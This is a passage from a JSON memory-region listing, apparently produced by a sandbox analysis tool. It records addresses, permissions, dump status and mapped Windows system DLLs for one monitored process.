"norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:04.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_992", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:04.846", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000993-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_993", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:04.846", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000994-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_994", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:04.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_995", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:04.863", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000996-addr_0x0000000000180000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_996", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:04.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3043327, "entry_point": 2621440, "filename": "\\Windows\\System32\\locale.nls", "id": "region_997", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2621440, "timestamp": "00:01:04.864", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000998-addr_0x0000000000340000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_998", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:04.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5144575, "entry_point": 0, "filename": null, "id": "region_999", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:04.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1832910848, "type": "region", "version": 1 }, "end_va": 1833242623, "entry_point": 1833080972, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_1000", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1832910848, "timestamp": "00:01:04.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1001", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:04.868", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1002", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:01:04.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1003", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:01:04.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1004", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:01:04.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1005", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:01:04.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1006", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:01:04.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1007", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:01:04.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1008", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:01:04.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1009", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:01:04.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 2004221952, "type": "region", "version": 1 }, "end_va": 2004807679, "entry_point": 2004238257, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1010", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 2004221952, "timestamp": "00:01:04.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1011", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:04.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1012", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:04.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1013", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:01:04.879", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001014-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1014", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:04.886", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001015-addr_0x0000000000140000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1015", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:04.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6230015, "entry_point": 0, "filename": null, "id": "region_1016", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:01:04.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_1017", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:01:04.886", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001018-addr_0x0000000001350000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20250624, "type": "region", "version": 1 }, "end_va": 20316159, "entry_point": 0, "filename": null, "id": "region_1018", "name": "private_0x0000000001350000", "norm_filename": null, "region_type": "private_memory", "start_va": 20250624, "timestamp": "00:01:04.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1019", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:01:04.887", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001020-addr_0x0000000001200000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_1020", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:01:04.893", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001021-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1021", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:04.893", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001022-addr_0x0000000000150000-size_0x000000000000e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 57344, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1433599, "entry_point": 0, "filename": null, "id": "region_1022", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:04.939", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001023-addr_0x0000000000160000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1495039, "entry_point": 0, "filename": null, "id": "region_1023", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:04.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1024", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:01:04.944", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1025", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:01:04.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1868562432, "type": "region", "version": 1 }, "end_va": 1868922879, "entry_point": 1868567476, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_1026", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1868562432, "timestamp": "00:01:05.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1868234752, "type": "region", "version": 1 }, "end_va": 1868558335, "entry_point": 1868239954, "filename": "\\Windows\\System32\\webio.dll", "id": "region_1027", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1868234752, "timestamp": "00:01:05.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1976434688, "type": "region", "version": 1 }, "end_va": 1977704447, "entry_point": 1976441653, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1028", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1976434688, "timestamp": "00:01:05.165", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1998454784, "type": "region", "version": 1 }, "end_va": 1999458303, "entry_point": 1998461029, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1029", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1998454784, "timestamp": "00:01:05.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1977810944, "type": "region", "version": 1 }, "end_va": 1979887615, "entry_point": 1977819865, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1030", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1977810944, "timestamp": "00:01:05.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1972162559, "entry_point": 1971000714, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1031", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:01:05.169", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970847743, "entry_point": 1970807694, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1032", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:05.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1969487872, "type": "region", "version": 1 }, "end_va": 1969598463, "entry_point": 1969525689, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1033", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1969487872, "timestamp": "00:01:05.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20316160, "type": "region", "version": 1 }, "end_va": 23261183, "entry_point": 20316160, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1034", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20316160, "timestamp": "00:01:05.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001035-addr_0x0000000000170000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1560575, "entry_point": 0, "filename": null, "id": "region_1035", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:01:05.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1997774847, "entry_point": 1985418753, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1036", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:07.687", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960582301, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1037", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:07.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970384895, "entry_point": 1970346386, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1038", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:07.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947860992, "type": "region", "version": 1 }, "end_va": 1947914239, "entry_point": 1947865568, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_1039", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947860992, "timestamp": "00:01:07.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3084287, "entry_point": 0, "filename": null, "id": "region_1040", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:07.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 86016, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3231743, "entry_point": 0, "filename": null, "id": "region_1041", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:07.706", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001042-addr_0x0000000001630000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 23265280, "type": "region", "version": 1 }, "end_va": 24313855, "entry_point": 0, "filename": null, "id": "region_1042", "name": "private_0x0000000001630000", "norm_filename": null, "region_type": "private_memory", "start_va": 23265280, "timestamp": "00:01:10.713", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001043-addr_0x0000000001730000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 24313856, "type": "region", "version": 1 }, "end_va": 25362431, "entry_point": 0, "filename": null, "id": "region_1043", "name": "private_0x0000000001730000", "norm_filename": null, "region_type": "private_memory", "start_va": 24313856, "timestamp": "00:01:10.713", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001044-addr_0x0000000001830000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 25362432, "type": "region", "version": 1 }, "end_va": 26411007, "entry_point": 0, "filename": null, "id": "region_1044", "name": "private_0x0000000001830000", "norm_filename": null, "region_type": "private_memory", "start_va": 25362432, "timestamp": "00:01:10.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1964900352, "type": "region", "version": 1 }, "end_va": 1964990463, "entry_point": 1964912067, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1045", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1964900352, "timestamp": "00:01:10.713", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001046-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_1046", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:10.714", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001047-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1047", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": 